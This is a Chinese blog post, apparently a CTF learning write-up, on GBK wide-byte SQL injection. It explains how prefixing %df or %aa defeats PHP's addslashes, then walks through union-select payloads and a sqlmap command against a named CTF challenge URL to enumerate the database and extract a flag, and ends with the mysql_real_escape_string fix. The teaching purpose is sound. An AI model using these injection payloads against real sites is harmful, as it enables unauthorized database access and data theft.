ctf php sql注入,【CTF-Web Learning 1】0x01 SQL注入之宽字节注入

最新推荐文章于 2022-09-05 21:05:33 发布
最新推荐文章于 2022-09-05 21:05:33 发布
阅读量310 收藏 1
点赞数
文章标签: ctf php sql注入

0x01 前言

准备系统梳理和总结提高这一年所学的关于Web方面东西,如有问题欢迎指点。

在计算机中,字符的表示与存储都离不开编码。例如ASCII,utf-8,gbk2312等。通常字符的表示都只需1字节。但也有如gbk2312这种需要2字节来表示的编码格式,这种我们称之为宽字节。

所谓宽字节注入,可能存在于以gbk编码存储数据的sql数据库中。在实际站点中已经比较少见(常见于学校远古破站),而且修复方案很简单。在CTF中属于入门的sql注入题目。

0x02 宽字节注入原理分析

0x01 认识addslashes

在基于php对sql注入的防御里,总会提到这个函数。

addslashes ( string $str ) : string

在php官方文档中,对该函数的说明如下:

返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是单引号(')、双引号(")、反斜线()与 NUL(NULL 字符)。

举例:

$str = "Is your name O'reilly?";

// 输出: Is your name O\'reilly?

echo addslashes($str);

?>

对于最简单的字符型数字型注入,经改函数转义的sql语句确实会“卡死“单引号。(构造攻击的sql语句不会执行)

但对于该函数的绕过,其实并不困难,无非两点:

1.在前面再加一个(或单数个),变成( '),可以导致被转义,从而让‘逃出限制。

2.把弄没。**

在下面的例子中你可以体会到,若是该数据库采用了宽字节的编码,这个函数就变成了纸老虎。

0x02 宽字节注入原理

宽字节注入利用了mysql一个特性,即当mysql在使用GBK编码的时候,会认为两个字符是一个汉字。(前一个ASCII码要大于128,才到汉字的范围)

先了解一下这些字符的url编码:

2d39ceb9cc6d3ce4a6094d398fedc8bb.png

当输入单引号,经addslashes转义后,对应的url编码是:

‘ --> \' --> %5C%27

当在前面引入一个ASCII大于128的字符(比如%df),url编码变为:

%df --> %df \ ' --> (%df%5C)%27

若使用gbk编码的话,%df%5C会被当作一个汉字处理,从而使%27(单引号)逃出生天,成功绕过

我们用url编码来研究一下:

当使用gbk编码,可以看到一个汉字占了2个字节。

fa0ad99ff8908ff1fffef97f425dc5f1.png

1fe8117f0f1925d2b36f18c83a5b40c2.png

来对\'编码一下:

98fa35461af0d9cb679341e9305b0463.png

ef1e29fc4e2dec6d3da432f32ce935aa.png

现在在前面加上%df,可以看到%df%5C被当成了汉字,单引号成功逃脱:

8a76d3d8fb1e834d9589212d021b493b.png

415081e0ff168f685d870f31f7e930ae.png

0x03 宽字节注入利用释例

这里以南邮ctf(CG CTF)一道Web题:SQL-GBK为例。

acbf27136e7b66ad2ade96fdbfb870d6.png

输入id=1',可以看到’被变成了\',是addslashes函数转义的结果。

e523c417980dee35bd8bc889d1f75661.png

用上文讲到的方法,构造id=1%df',id=1%aa',成功报错

4d849b6901764083390437110018b858.png

7db66cce8815e9ee2a14f48d4104f2e3.png

首先构造order by语句尝试获得列数,注意最后要用闭合(注释掉后面的语句,不让其影响构造语句执行)

常见的闭合手段有:井号,--+等。

这里用井号,用%23来表示,否则可能解析不了

?id=1%aa' order by 2 %23

c4583c6e0abfeaa327111a5ed9d286e1.png

e5dfa9f7cd7e1b860f06f29be6a69aa1.png

3已经报错了,可以知道列数(字段数)为2.

?id=999%aa' union select 1,2 %23

af0cded7808e0d9e6d83feb05c2bf49a.png

知道了回显的位置是2.

下一步,把2改成database(),成功获取库名:sae-chinalover

?id=999%aa' union select 1,database() %23

b0a285b20c77a099360aa134c001820f.png

继续跟进,查表名。(不放链接了,不太清楚可以百度下mysql自身的系统库结构与读取信息的函数):

注意:因为单引号会被转义,所以直接令table_schema=库名是行不通的。

?id=999%aa' union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'sae-chinalover' %23

可以把库名代替为database()。成功获取表名。

?id=999%aa' union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() %23

0d05c6089dc3a5bbd7f0255d62c84bf7.png

下一步爆字段,把四个表的字段依次爆一遍,在ctf4中发现有flag字段:

?id=999%aa' union select 1,group_concat(column_name) from information_schema.columns where table_name = 0x63746634 %23

819762de4ff5a76871352956817921df.png

查询一下,成功获取flag。

8aa885db5015a56f7b336998ba27396d.png

4ed4e5078d1e76bca2c39fddbe8ea62c.png

顺便一题,这道题目也可以用sqlmap直接跑。把你构造的宽字符绕过语句扔上去就行了。以爆库名为例:

sqlmap -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%aa%27" --current-db

6493fbd72495ed78e1c63e5092b8cb9a.png

0x04 宽字节注入的防御

对于宽字节注入,有一种最好的修补就是:

(1)使用mysql_set_charset(GBK)指定字符集

(2)使用mysql_real_escape_string进行转义

mysql_real_escape_string与addslashes的不同之处在于其会考虑当前设置的字符集。不会出现把%aa%5c拼接为一个宽字节的问题。

所以用mysql_set_charset对当前字符集进行指定,然后转义即可。

航天拍卖
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF从入门到提升之宽字节注入
anquanniu的博客
08-15 1407
CTF入门到放弃 为什么说是从入门到放弃呢?(开个玩笑)如果说大家对CTF有了解的话,其实应该知道CTF是一个什么类型的比赛,这个比赛涉及的范围和影响有多大。如果说你真的想打好比赛,那也是真的非常不容易的,所以说这是非常困难的一件事情,初期可能学着学着就想放弃了,所以我就以这个来作为一个标题,当然本意不是让大家去放弃,就是为了让大家入个门然后再提升! 我会和我朋友一起来完成这门课程的讲解。 课程主...
CTF练习(3)-这个看起来有点简单!(SQL注入
qq_35097943的博客
03-19 445
一、打开题目链接 题目链接:http://www.shiyanbar.com/ctf/33 看到一个表格,很容易联想到数据库,不过还是从源码看起 源码中是一个简单的table表格,看到代码中含有’1’,那么再看URl:http://ctf5.shiyanbar.com/8/index.php?id=1,id = 1? 可以分析出这可能是一个SQL注入点。 SQL注入:就是前端通过提...
CTF系列之Web——SQL注入
洛柒尘的博客
06-09 8205
前言 在刚学习sql注入的过程中非常艰难,查资料的时间有一周这么长,点开的网页也不下一千,认真读的也最少有两百,可是能引导入门的真的没几篇,都是复制来复制去的,没意思,感觉就是在浪费时间。有很多知识点都很散,很少能考到一片吧所有知识点总结在一块,最少也要三四个知识点也好呀,可惜太少了,大部分大佬写的都是基于他们现有的技术写的,写的很笼统,不适合新手看。可以发现很多大佬的文章看不懂就是这个原因,没有基础看的很懵的。所以我就想着写两三篇来总结我学习过的sql注入知识点。 学习web系列推荐先学习Mysql、H
南邮CTF injection-3 宽字节注入
include_heqile的博客
03-22 3036
从昨天晚上开始做的,结果踩了一个坑,干到了凌晨1点,电脑都自动关机了,也没做出来,电脑关机之后,又用手机查了一下,知道了应该用表名的16进制形式来进行爆表,然后到今天上午才做完,还是上计组的时候用手机的火狐做的,手机做是真的难受宽字节注入就是用一个大于128的十六进制数来吃掉转义符\,gbk编码,字节作为一个字符的编码表名库名的十六进制形式: 字符形式的表名: ctf表示成十...
(学习)SQL注入--宽字节注入
Huang921的博客
11-21 3856
SQL注入宽字节注入实践
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
SQL注入原理及PHP防注入代码.pdf
03-31
SQL注入基本概念,原理,防注入php代码以及 相关的图片实例,具体可下载查看。
SQL注入技巧2-常用技巧总结(攻击向量)
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
sql注入攻击流量情况
07-18
sql注入攻击流量情况
CTF-Web-Challenge:使用PHPWeb中进行CTF挑战
03-25
CTF-网络挑战使用PHPWeb中进行CTF挑战链接: :
宽字节注入
heiseweiye的博客
09-16 1万+
GBK注射 宽字节注入 ** 在使用PHP连接MySQL的时候,当设置“set character_set_client = gbk”时会导致一个编码转换的问题,也就是我们熟悉的宽字节注入,当存在宽字节注入的时候,注入参数里带入% DF%27,即可把(%5C)吃掉,举个例子。 ** http://chinalover.sinaapp.com/SQL-GBK/in...
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 3939
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
bugku 宽字节注入
uniq_sea的博客
04-14 401
习惯性先查看源代码。看到编码是gb2312的格式----》宽字节注入构造url,这里输入:103.238.227.13:10083/?id=1%bf' order by 2#  同样会报错,因为#不会被翻译,所以需要手工翻译===》判断出两个字段。然后爆数据库查询数据库...
MySQL宽字节注入漏洞分析_CTF/CTF练习平台 --SQL注入测试【sql宽字节注入与#,#】...
weixin_35666711的博客
02-08 112
原题内容:http://103.238.227.13:10083/这题其实就是考验sql注入基本功,写个wp记录下自己的几个失误点,与大家共同学习首先,打开页面可见题目提示的很明显了,这是一个注入题,我们肯定得找到注入点,一般的思路都是'闭合导致注入,关键是找到什么数据被传入了数据库,才能确定注入点按照常规思路,习惯性加上一个index.php,没问题,可以,再试试get进去个变量?id=1(至于...
CTF-命令注入【超详细】
不知名白帽的博客
09-05 9092
CTF-命令注入【超详细】
CTF之路:关于PHP eval() 注入问题
zw05011的博客
01-03 4538
CTF之路:关于PHP eval() 注入问题
sql宽字节注入详解
Pz_mstr's Blog
10-12 3897
转载大牛离别歌的文章:https://www.leavesongs.com/PENETRATION/mutibyte-sql-inject.html 尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统一的国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型
小技巧|addslashes绕过
weixin_30906425的博客
11-26 1518
1:字符编码问题导致绕过 1.1、设置数据库字符为gbk导致宽字节注入 1.2、使用icon,mb_convert_encoding转换字符编码函数导致宽字节注入 2:编码解码导致的绕过 2.1、url解码导致绕过addslashes 2.2、base64解码导致绕过addslashes 2.3、json编码导致绕过addslashes 3:一些特殊情况导致的绕过 ...
ctf sql注入关键词绕过【积累中】
热门推荐
Sp4rkW的博客
09-25 2万+
写在前面:这个博客知识点来源于个人ctf练习比赛中积累的知识点及网络中各个博客的总结点,这里做测试和记录 0x00 sql注入理解 SQL注入能使攻击者绕过认证机制,完全控制远程服务器上的数据库。 SQL是结构化查询语言的简称,它是访问数据库的事实标准。目前,大多数Web应用都使用SQL数据库来存放应用程序的数据。几乎所有的Web应用在后台 都使用某种SQL数据库。跟大多数语言一...
ctfhub sql注入
最新发布
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值